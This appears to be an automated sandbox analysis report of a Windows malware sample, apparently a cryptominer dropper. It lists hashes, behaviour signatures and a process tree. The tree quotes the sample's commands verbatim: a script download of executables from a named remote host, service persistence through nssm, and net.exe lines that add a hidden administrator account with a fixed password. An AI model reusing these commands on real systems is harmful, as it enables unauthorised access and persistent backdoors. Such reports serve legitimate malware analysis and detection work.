328449250e95af61e5e92254665d4c1a43d835482cd2d159c1e8a08a1ad8c725

Analysis

max time kernel
115s
max time network
110s
platform
windows10_x64
resource
win10v20201028
submitted
24-11-2020 02:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe
Size

5.3MB
MD5

6314c3ecbae10e28e206833b129fe3eb
SHA1

a06bcacec00cd8547b51235d4d16439427f3adf0
SHA256

197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a
SHA512

68a61b1ef9ce13edb0986ede5d1f6355b27ca3d59768fc83b66c78e8d4e6248b222f12e178389f544df853616078122d1af96aaaadd34001b10189c246cad918

Score

9^/10

persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blacklisted process makes network request 2 IoCs

flow	pid	Process
12	2740	WScript.exe
13	2384	WScript.exe

Executes dropped EXE 4 IoCs

pid	Process
3396	nssm.exe
1428	nssm.exe
3648	nssm.exe
2328	UserUpdater.exe

Loads dropped DLL 2 IoCs

pid	Process
3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe
3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe

JavaScript code in executable 3 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ab6f-1.dat	js
behavioral2/files/0x000100000001ab6f-2.dat	js
behavioral2/files/0x000100000001ab74-5.dat	js

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\TemppV2\UserUpdater.exe	WScript.exe
File created	C:\Windows\System32\TemppV2\nssm.exe	WScript.exe

Modifies service 2 TTPs 11 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\USRUpdate\Parameters\AppParameters	nssm.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\USRUpdate\Parameters\AppDirectory	nssm.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\NSSM\EventMessageFile = "C:\\Windows\\System32\\TemppV2\\nssm.exe"	nssm.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\NSSM\TypesSupported = "7"	nssm.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\NSSM	nssm.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\USRUpdate\Parameters\AppExit	nssm.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\USRUpdate\Parameters	nssm.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\USRUpdate\Parameters	nssm.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\USRUpdate\Parameters\Application = "UserUpdater.exe"	nssm.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\USRUpdate\Parameters\AppExit	nssm.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\USRUpdate\Parameters\AppExit\ = "Restart"	nssm.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1268	timeout.exe
2752	timeout.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2328	UserUpdater.exe
2328	UserUpdater.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: 35	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe
Token: SeDebugPrivilege	2328	UserUpdater.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 500 wrote to memory of 3300	500	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	71
PID 500 wrote to memory of 3300	500	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	71
PID 3300 wrote to memory of 1420	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	75
PID 3300 wrote to memory of 1420	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	75
PID 3300 wrote to memory of 1440	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	77
PID 3300 wrote to memory of 1440	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	77
PID 1440 wrote to memory of 2740	1440	cmd.exe	79
PID 1440 wrote to memory of 2740	1440	cmd.exe	79
PID 3300 wrote to memory of 3964	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	81
PID 3300 wrote to memory of 3964	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	81
PID 3964 wrote to memory of 2384	3964	cmd.exe	83
PID 3964 wrote to memory of 2384	3964	cmd.exe	83
PID 3300 wrote to memory of 1876	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	84
PID 3300 wrote to memory of 1876	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	84
PID 1876 wrote to memory of 3396	1876	cmd.exe	86
PID 1876 wrote to memory of 3396	1876	cmd.exe	86
PID 3300 wrote to memory of 2156	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	87
PID 3300 wrote to memory of 2156	3300	197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe	87
PID 2156 wrote to memory of 1428	2156	cmd.exe	89
PID 2156 wrote to memory of 1428	2156	cmd.exe	89
PID 3648 wrote to memory of 2328	3648	nssm.exe	92
PID 3648 wrote to memory of 2328	3648	nssm.exe	92
PID 2328 wrote to memory of 2160	2328	UserUpdater.exe	94
PID 2328 wrote to memory of 2160	2328	UserUpdater.exe	94
PID 2160 wrote to memory of 2444	2160	net.exe	95
PID 2160 wrote to memory of 2444	2160	net.exe	95
PID 2328 wrote to memory of 3984	2328	UserUpdater.exe	96
PID 2328 wrote to memory of 3984	2328	UserUpdater.exe	96
PID 3984 wrote to memory of 3748	3984	net.exe	97
PID 3984 wrote to memory of 3748	3984	net.exe	97
PID 2328 wrote to memory of 424	2328	UserUpdater.exe	98
PID 2328 wrote to memory of 424	2328	UserUpdater.exe	98
PID 424 wrote to memory of 2772	424	net.exe	99
PID 424 wrote to memory of 2772	424	net.exe	99
PID 2328 wrote to memory of 1220	2328	UserUpdater.exe	100
PID 2328 wrote to memory of 1220	2328	UserUpdater.exe	100
PID 1220 wrote to memory of 2128	1220	net.exe	101
PID 1220 wrote to memory of 2128	1220	net.exe	101
PID 2328 wrote to memory of 1268	2328	UserUpdater.exe	102
PID 2328 wrote to memory of 1268	2328	UserUpdater.exe	102
PID 2328 wrote to memory of 1292	2328	UserUpdater.exe	106
PID 2328 wrote to memory of 1292	2328	UserUpdater.exe	106
PID 1292 wrote to memory of 3168	1292	net.exe	107
PID 1292 wrote to memory of 3168	1292	net.exe	107
PID 2328 wrote to memory of 3636	2328	UserUpdater.exe	108
PID 2328 wrote to memory of 3636	2328	UserUpdater.exe	108
PID 3636 wrote to memory of 1868	3636	net.exe	109
PID 3636 wrote to memory of 1868	3636	net.exe	109
PID 2328 wrote to memory of 2036	2328	UserUpdater.exe	110
PID 2328 wrote to memory of 2036	2328	UserUpdater.exe	110
PID 2036 wrote to memory of 3916	2036	net.exe	111
PID 2036 wrote to memory of 3916	2036	net.exe	111
PID 2328 wrote to memory of 2740	2328	UserUpdater.exe	112
PID 2328 wrote to memory of 2740	2328	UserUpdater.exe	112
PID 2740 wrote to memory of 2080	2740	net.exe	113
PID 2740 wrote to memory of 2080	2740	net.exe	113
PID 2328 wrote to memory of 2752	2328	UserUpdater.exe	114
PID 2328 wrote to memory of 2752	2328	UserUpdater.exe	114

C:\Users\Admin\AppData\Local\Temp\197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe
"C:\Users\Admin\AppData\Local\Temp\197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:500
- C:\Users\Admin\AppData\Local\Temp\197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe
  "C:\Users\Admin\AppData\Local\Temp\197f0e170fac2b8c5f1b79d1865ce25f95f4b1a45408b091b5741710a3d9e32a.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir C:\Windows\System32\TemppV2
    3⤵
    PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c Deploy.vbs http://fin-vz2.gullo.me:13610/autominer/USR.exe C:\Windows\System32\TemppV2\UserUpdater.exe
    3⤵
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1440
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Deploy.vbs" http://fin-vz2.gullo.me:13610/autominer/USR.exe C:\Windows\System32\TemppV2\UserUpdater.exe
      4⤵
      Blacklisted process makes network request
      Drops file in System32 directory
      PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c Deploy.vbs http://fin-vz2.gullo.me:13610/autominer/nssm.exe C:\Windows\System32\TemppV2\nssm.exe
    3⤵
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3964
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Deploy.vbs" http://fin-vz2.gullo.me:13610/autominer/nssm.exe C:\Windows\System32\TemppV2\nssm.exe
      4⤵
      Blacklisted process makes network request
      Drops file in System32 directory
      PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c nssm install USRUpdate UserUpdater.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Windows\System32\TemppV2\nssm.exe
      nssm install USRUpdate UserUpdater.exe
      4⤵
      Executes dropped EXE
      Modifies service
      PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c nssm start USRUpdate
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2156
  - - C:\Windows\System32\TemppV2\nssm.exe
      nssm start USRUpdate
      4⤵
      Executes dropped EXE
      PID:1428

C:\Windows\System32\TemppV2\nssm.exe
C:\Windows\System32\TemppV2\nssm.exe
1⤵
- Executes dropped EXE
- Modifies service
- Suspicious use of WriteProcessMemory
PID:3648
- C:\Windows\System32\TemppV2\UserUpdater.exe
  "UserUpdater.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user MSSQL Mr@1X3#AL /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user MSSQL Mr@1X3#AL /add
      4⤵
      PID:2444
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user MSSQL Mr@1X3#AL
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user MSSQL Mr@1X3#AL
      4⤵
      PID:3748
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user MSSQL /active:yes
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user MSSQL /active:yes
      4⤵
      PID:2772
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators MSSQL /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators MSSQL /add
      4⤵
      PID:2128
- - C:\Windows\system32\timeout.exe
    "C:\Windows\system32\timeout.exe" 100
    3⤵
    - Delays execution with timeout.exe
    PID:1268
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user MSSQL Mr@1X3#AL /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user MSSQL Mr@1X3#AL /add
      4⤵
      PID:3168
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user MSSQL Mr@1X3#AL
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user MSSQL Mr@1X3#AL
      4⤵
      PID:1868
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user MSSQL /active:yes
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user MSSQL /active:yes
      4⤵
      PID:3916
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators MSSQL /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators MSSQL /add
      4⤵
      PID:2080
- - C:\Windows\system32\timeout.exe
    "C:\Windows\system32\timeout.exe" 100
    3⤵
    - Delays execution with timeout.exe
    PID:2752

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2328-27-0x00007FFAB5710000-0x00007FFAB60FC000-memory.dmp

Filesize
9.9MB

Download
memory/2328-35-0x000000001C550000-0x000000001C551000-memory.dmp

Filesize
4KB

Download
memory/2328-34-0x000000001C080000-0x000000001C081000-memory.dmp

Filesize
4KB

Download
memory/2328-28-0x0000000000930000-0x0000000000931000-memory.dmp

Filesize
4KB

Download